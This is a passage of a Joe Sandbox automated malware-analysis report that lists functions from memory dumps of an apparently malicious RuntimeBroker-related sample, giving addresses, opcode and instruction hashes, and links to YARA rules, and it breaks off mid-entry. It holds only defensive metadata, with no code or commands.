                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 6f48a9a80308f86f4229a9ad8f5e5ec023903ab9ee2c8189cea8e4f27d3b734b
                                                                      • Instruction ID: bce0304e481d2b3bbfc9e20c5e8c033dfd0450ece6d9b143f234d6e3b8b93a21
                                                                      • Opcode Fuzzy Hash: 6f48a9a80308f86f4229a9ad8f5e5ec023903ab9ee2c8189cea8e4f27d3b734b
                                                                      • Instruction Fuzzy Hash: CFE0127194F3C48FCB56EB7588658547FB0AE6761074B41EEC085CF1B3D62D9849C701
                                                                      Function 00007FFD9B8C7D19 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 4df0ab70ae7f309628f2faeb7f6dcb5ebb956beb4ff421f67bf74f580f61ea40
                                                                      • Instruction ID: 19cf3b2479bac00445e6717740ed3d6f83370dffcb73bfc4efe64230e81bc516
                                                                      • Opcode Fuzzy Hash: 4df0ab70ae7f309628f2faeb7f6dcb5ebb956beb4ff421f67bf74f580f61ea40
                                                                      • Instruction Fuzzy Hash: A7E01A7154E3C44FCB06AB7488699553FA09E6B21178B41DEC08ACF1B3D62D8949C701
                                                                      Function 00007FFD9B8C1C79 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 83dc0d97cbbc427e747160c5e42807c5c195f7ff0b624313fe927a8df981d17d
                                                                      • Instruction ID: c2d69d25213d0432d2159185ff618fdd2896ded8965f33a28b3759c8a94cd7f7
                                                                      • Opcode Fuzzy Hash: 83dc0d97cbbc427e747160c5e42807c5c195f7ff0b624313fe927a8df981d17d
                                                                      • Instruction Fuzzy Hash: 16E01A6154E3C04FCB06EB7884699553FA09E6721178B41EEC04ACF1B3D62D8949C701
                                                                      Function 00007FFD9B8B9391 Relevance: .3, Instructions: 317COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8b3000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8b9a0a53ce3991c3ba5148d253685b4c06a6cbfcebe5c10e7193b995b86a510a
                                                                      • Instruction ID: 10bd39154257a0c66710f1b41176f062cca972b9a1f1c429ed57a865bf0f22b6
                                                                      • Opcode Fuzzy Hash: 8b9a0a53ce3991c3ba5148d253685b4c06a6cbfcebe5c10e7193b995b86a510a
                                                                      • Instruction Fuzzy Hash: 4BA19270B1991D4FDB58EF68C4A8AB977E1FF98314B114579D01EC32D6DE38A8428B80
                                                                      Function 00007FFD9B8C32DD Relevance: .3, Instructions: 282COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cb1337551a0ecb718b24960a639d2738d0fdf5524124192cc419ff7b7ceac4be
                                                                      • Instruction ID: 2062c6e109a985d654e15bb3c7c87a9220fbd99fc5f0686b12647b3281dc8e7e
                                                                      • Opcode Fuzzy Hash: cb1337551a0ecb718b24960a639d2738d0fdf5524124192cc419ff7b7ceac4be
                                                                      • Instruction Fuzzy Hash: 9F81F561B1DA4E0FEBACFB6854A667472D2EFA8310F05417AD40EC31E7DD38AD464741
                                                                      Function 00007FFD9B8C3365 Relevance: .2, Instructions: 198COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dc55f8a315e70e2f74325890f7f4e6a41c969971e30e9870f9884c95ff50b01e
                                                                      • Instruction ID: ab413afcd0e386d55aac8631134787002d6928c33dc361bf7e54ef3bcc9d9b85
                                                                      • Opcode Fuzzy Hash: dc55f8a315e70e2f74325890f7f4e6a41c969971e30e9870f9884c95ff50b01e
                                                                      • Instruction Fuzzy Hash: 5B51D861B1D94E0FE7ACFFA8546667972D1EF98300F04417AD40EC31D6ED39AD464741
                                                                      Function 00007FFD9B890D78 Relevance: .2, Instructions: 188COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9de34005d647cee0542e2372b519a025bec4199f5092e0aef665383b95ab4d94
                                                                      • Instruction ID: 34e0d278fefc42fe7dc6b69c1423981f830524a6c3e776947481f57c16074df1
                                                                      • Opcode Fuzzy Hash: 9de34005d647cee0542e2372b519a025bec4199f5092e0aef665383b95ab4d94
                                                                      • Instruction Fuzzy Hash: 0A51C361B29A8D4FDB9ADBAC88657A8BFE1FF99300F4400BAD059C72D6DE781801C741
                                                                      Function 00007FFD9B890998 Relevance: .1, Instructions: 137COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2006c028887ee205de16f9ef1b75e656f9e692a4cea79a978571f7797001bb97
                                                                      • Instruction ID: 9d78cbd164ffd111f5fe821b8ebce4f675bff6115daa895abaf117660a732533
                                                                      • Opcode Fuzzy Hash: 2006c028887ee205de16f9ef1b75e656f9e692a4cea79a978571f7797001bb97
                                                                      • Instruction Fuzzy Hash: 70412720B1ED1D1FEB94A76C586A679BBD2EB9D311B0500B9E40DC32E7DD28AC414341
                                                                      Function 00007FFD9B8908E8 Relevance: .1, Instructions: 133COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c6f3dcce408037af0bfcc1fd562898c8b4b01e48d0de5430fc747db31bd9259e
                                                                      • Instruction ID: 2dbd788af1dd3aa85cb5b020e09f3194dbd01ede1029f73cd545fa5935407d9d
                                                                      • Opcode Fuzzy Hash: c6f3dcce408037af0bfcc1fd562898c8b4b01e48d0de5430fc747db31bd9259e
                                                                      • Instruction Fuzzy Hash: 2731043130D9194FDB68EB5CE88A9B97BD1EF8932131541BBE48AC7176D911EC828781
                                                                      Function 00007FFD9B8CABA8 Relevance: .1, Instructions: 120COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8946991a7456d8e9be6597acf80eec42d46f7ed3ff30725117135935bc02b26d
                                                                      • Instruction ID: ad908d1c2bbc1acfefd83db46594e69adb8f2846cfb6f1be23e286f511a2c3bd
                                                                      • Opcode Fuzzy Hash: 8946991a7456d8e9be6597acf80eec42d46f7ed3ff30725117135935bc02b26d
                                                                      • Instruction Fuzzy Hash: D731B1A1B1A94E5FE7A8FB6844A66B477D2EB9C300B1501BAE04DC71FBDD38AD418340
                                                                      Function 00007FFD9B8C22A8 Relevance: .1, Instructions: 116COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2e397bfac7922568a954f2755b9952f11e5e865dc729b9b14b1aad0260887caf
                                                                      • Instruction ID: c57aebefc3f382fa054dde80db92e4efcadcf61281334af41bb6a4ef2fa567b5
                                                                      • Opcode Fuzzy Hash: 2e397bfac7922568a954f2755b9952f11e5e865dc729b9b14b1aad0260887caf
                                                                      • Instruction Fuzzy Hash: 1C312572A0D91D4FEB64FF98D8A46B97391EBA8320F04037BD40DC72D5CD2469418780
                                                                      Function 00007FFD9B89119D Relevance: .1, Instructions: 94COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 62dc6f3fec2a8f8b1db601053cca6850a5d1a125009f82ffdada9076223bdb0d
                                                                      • Instruction ID: 49e812ea1cf60cd2d8a5e2a87b641f377598fab47b95bd2199a8bf15d9d74c7b
                                                                      • Opcode Fuzzy Hash: 62dc6f3fec2a8f8b1db601053cca6850a5d1a125009f82ffdada9076223bdb0d
                                                                      • Instruction Fuzzy Hash: 5A31A231A0D64E9FDF45EBA8C8689B97BF1FF69300B0505BAC009D72A2DE28A941C740
                                                                      Function 00007FFD9B890C25 Relevance: .1, Instructions: 88COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dd42cd4c6c79ebf97f3fc10ee3b4ce4233919ad0603b2fe168c69bb2f7a02fb6
                                                                      • Instruction ID: 26b371ae5d22925d681d1fefb9f09113c9bfb7e649d808597faecbeb96354945
                                                                      • Opcode Fuzzy Hash: dd42cd4c6c79ebf97f3fc10ee3b4ce4233919ad0603b2fe168c69bb2f7a02fb6
                                                                      • Instruction Fuzzy Hash: 25213736B1E25D8FEB26A7A8AC250DC7F60EF45328F0541F3D058CB1D3D92826469781
                                                                      Function 00007FFD9B8CC998 Relevance: .1, Instructions: 81COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: aa30fb7a45d2745f9d71bfc90eb99541d9e54c6a6138c6727b9b8d51128631b7
                                                                      • Instruction ID: 33515117100cdeccbce0b733b35a0a716c785f03c9a7c7ae55017aaa7df89d96
                                                                      • Opcode Fuzzy Hash: aa30fb7a45d2745f9d71bfc90eb99541d9e54c6a6138c6727b9b8d51128631b7
                                                                      • Instruction Fuzzy Hash: 70219272F0551D8BEB64FA98D8547FE73A2EBD8311F018177D009D3298DE396A4687D0
                                                                      Function 00007FFD9B891B9F Relevance: .1, Instructions: 79COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3e0dd8dc3d9944f5588ff4d58079b1628987fb6bab8c065160020d883808509d
                                                                      • Instruction ID: fec1a2d292ebe15e690a27d3c8d3668cf4e45f7402c3822f2dd18102452d4b2a
                                                                      • Opcode Fuzzy Hash: 3e0dd8dc3d9944f5588ff4d58079b1628987fb6bab8c065160020d883808509d
                                                                      • Instruction Fuzzy Hash: A7214721F1E90E9BEFB4F76884646B866D2EF8C711F5601B5D01ED72F2ED28AE418740
                                                                      Function 00007FFD9B8A4668 Relevance: .1, Instructions: 73COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 460e71bf9650a6608303dcee80272e9f57f96532747a1188183e1e9b29ae8fbd
                                                                      • Instruction ID: ed9b5a1feb58981887635b8200ebd2b543d81aa22bf60d9e7a8759de81023536
                                                                      • Opcode Fuzzy Hash: 460e71bf9650a6608303dcee80272e9f57f96532747a1188183e1e9b29ae8fbd
                                                                      • Instruction Fuzzy Hash: C321C931A0E6DD4FEB168F68C8701A57FA1AF4B310B0A41FBD049C71A3DA28590683A1
                                                                      Function 00007FFD9B890F90 Relevance: .1, Instructions: 66COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: df1965d16ef1bd89ccd89fa870d474802ad0be9b1d72ced381d890bb2f5c77d6
                                                                      • Instruction ID: 33794eebe3b9cbd9dd6b47171d4c84fb3774b861b9a3eaeeaae3bffdb75c082d
                                                                      • Opcode Fuzzy Hash: df1965d16ef1bd89ccd89fa870d474802ad0be9b1d72ced381d890bb2f5c77d6
                                                                      • Instruction Fuzzy Hash: 59216AB4A18AAD8EE349EF58C4A97A53FE4E795319F00007FC04ED2AD5CBB90065C744
                                                                      Function 00007FFD9B890C40 Relevance: .1, Instructions: 51COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dff02965e4bb69b985feb6ba3206d7c4126c26d43d9bde4fc1b6d2e1ec2ba544
                                                                      • Instruction ID: f38a2b5c159d21b014f59bb00da816dd5ab370d8c3d035f9dbb82760c4bff89d
                                                                      • Opcode Fuzzy Hash: dff02965e4bb69b985feb6ba3206d7c4126c26d43d9bde4fc1b6d2e1ec2ba544
                                                                      • Instruction Fuzzy Hash: DF11E132E1E38D8FEB12DBA8886019C7FB0EF56714F0641F7D054DB2A2D93866458780
                                                                      Function 00007FFD9B890C48 Relevance: .0, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ad1686fe9ed4408e77851cfea1247dba21914ade175b6c9789122ef5e64c8279
                                                                      • Instruction ID: d1d94c76d1346f6878fd9981222ae4c27dafc7d87efef206e9d1eafee5ef111e
                                                                      • Opcode Fuzzy Hash: ad1686fe9ed4408e77851cfea1247dba21914ade175b6c9789122ef5e64c8279
                                                                      • Instruction Fuzzy Hash: 7701C031E1E38D8FEB12DBA8886009C7FB0EF06704F0641F7D054DB2A2D93866458780
                                                                      Function 00007FFD9B890C50 Relevance: .0, Instructions: 40COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d1fede52656c878854f6dc3375b7117d7810db6a0738dc4634492ee50b92bf5e
                                                                      • Instruction ID: 32864386d666a27ddef3aa2b539f6f99fe1b8e43b80e78dd5bcfff2e813d6909
                                                                      • Opcode Fuzzy Hash: d1fede52656c878854f6dc3375b7117d7810db6a0738dc4634492ee50b92bf5e
                                                                      • Instruction Fuzzy Hash: B9019E31E1E38D8EEB22DBA8886409C7FB0AF1A704F1541F7D054CB2A2D93866448740
                                                                      Function 00007FFD9B891C2D Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                      • Instruction ID: 81e4882dc4778f48362ee329f6f9474d6999b61f6d868f8e80d67a8a0dd082ef
                                                                      • Opcode Fuzzy Hash: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                      • Instruction Fuzzy Hash: 9BF03134F5E41F9AEFB4A754C8647B87762FF98711F5542B9C00DA31A1DE386A818B40
                                                                      Function 00007FFD9B890B77 Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: aeb55fb6b84541ad52a460e63665507ded051ad4dd57889e2cd256dd785d0ed0
                                                                      • Instruction ID: a4f239b09f9e580014013dd1df75325c70794e5468312655f167317a617412ae
                                                                      • Opcode Fuzzy Hash: aeb55fb6b84541ad52a460e63665507ded051ad4dd57889e2cd256dd785d0ed0
                                                                      • Instruction Fuzzy Hash: 29F0E53571EA59CFC741AB38DC999D47F60EB47215BAA14FAC08AC7962C220586ECB44
                                                                      Function 00007FFD9B8CA4F9 Relevance: .0, Instructions: 33COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7eababa79df99af95b0ed9d09748bedfedb4831447a6c31983a4362d518fa4ce
                                                                      • Instruction ID: 0f0f96835cc818666733789956ea4040c73a393f41e74abf953420c42cc7dab1
                                                                      • Opcode Fuzzy Hash: 7eababa79df99af95b0ed9d09748bedfedb4831447a6c31983a4362d518fa4ce
                                                                      • Instruction Fuzzy Hash: B7E02B217197C80FC719567948650607BF1DF9B21138A41EBD096C72E3DD18DC458345
                                                                      Function 00007FFD9B891CDA Relevance: .0, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                      • Instruction ID: eb05ac72acd36fa1e355f1a98ee1d01b38a027b0277aca0ca464e1afbb3de9f5
                                                                      • Opcode Fuzzy Hash: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                      • Instruction Fuzzy Hash: 67F03A21F1E40E9AEFB0E798C8642B83753AF88B11F5642B5C00DA32F1DD28AA428640
                                                                      Function 00007FFD9B8C74D5 Relevance: .0, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5ca596a5051adcb12aecd00c26bfb0559bc4b2c3cacb76cd2172605fb1ebf51b
                                                                      • Instruction ID: 1c202315581f056a0c595c2d119a1491104f722a4f260ff0dc900fc09a3281e5
                                                                      • Opcode Fuzzy Hash: 5ca596a5051adcb12aecd00c26bfb0559bc4b2c3cacb76cd2172605fb1ebf51b
                                                                      • Instruction Fuzzy Hash: D7E06D66B0A6844FD71A6A384C758B43B918F6A22A75A04A7D046CF6F3D8159D498311
                                                                      Function 00007FFD9B8A3EB8 Relevance: .0, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b9f58ba7b8cb941651a7c4706ddb61e88a0e925ca703faed3b9a13acc19c8492
                                                                      • Instruction ID: 4a168a73183eefba2ce91238d3b479be9b77ce36ef23bc47fc1f3a475197b0c1
                                                                      • Opcode Fuzzy Hash: b9f58ba7b8cb941651a7c4706ddb61e88a0e925ca703faed3b9a13acc19c8492
                                                                      • Instruction Fuzzy Hash: 49F08235F0451E8BEB18DF84CC659BD73B5FB54340F510679D426DB2E8DE746A018780
                                                                      Function 00007FFD9B8CA0C9 Relevance: .0, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b0e44bbecd300ad20b089d6244668327e679081352e854c6e8b050764f737780
                                                                      • Instruction ID: d76dacb5a0c33f858fc90aff7325f76d3a893c3448b8a1d9d1efb4bb65bbfee3
                                                                      • Opcode Fuzzy Hash: b0e44bbecd300ad20b089d6244668327e679081352e854c6e8b050764f737780
                                                                      • Instruction Fuzzy Hash: DBE01220709B884FC70DA66948695647BB1EFAA21278A52DBC045CB6A3EE19DC85C741
                                                                      Function 00007FFD9B8CA589 Relevance: .0, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 95a90a4cb7e9b901fa3b5f7eb8dd5f2ebdc6149690c51b9f8f2418de34e328b5
                                                                      • Instruction ID: be2653dae989573074bf913477c8499db98a35f19379fc432810422f359cbcf1
                                                                      • Opcode Fuzzy Hash: 95a90a4cb7e9b901fa3b5f7eb8dd5f2ebdc6149690c51b9f8f2418de34e328b5
                                                                      • Instruction Fuzzy Hash: 72E08C2160AB844FC70EA7288CA99503BB1EFAB21278A40DBC005CB6B3EA1DCC49C741
                                                                      Function 00007FFD9B896A2B Relevance: .0, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 99395f661c71e463dcb607e9c3438f8178b598197d95f4a9f776743875848bc0
                                                                      • Instruction ID: a7451842b8d681d18f10bf320b8e3e65516a6f2e381d92470d6bd1a962184d98
                                                                      • Opcode Fuzzy Hash: 99395f661c71e463dcb607e9c3438f8178b598197d95f4a9f776743875848bc0
                                                                      • Instruction Fuzzy Hash: 83E0DF52F1A80E8AEBE8AB5804A83BC4AC0DF2C210F0600F6A40CC32E2EC2819C20781
                                                                      Function 00007FFD9B8A4622 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c0186bf66b95d362cb25a69d1c9eaecfc839f880f9ecefc7387d894ca53d3705
                                                                      • Instruction ID: 7ceed153ac2f168313dbd501c589e6f9ddc9fd4547ae7362bfcf7f6e491dd0a7
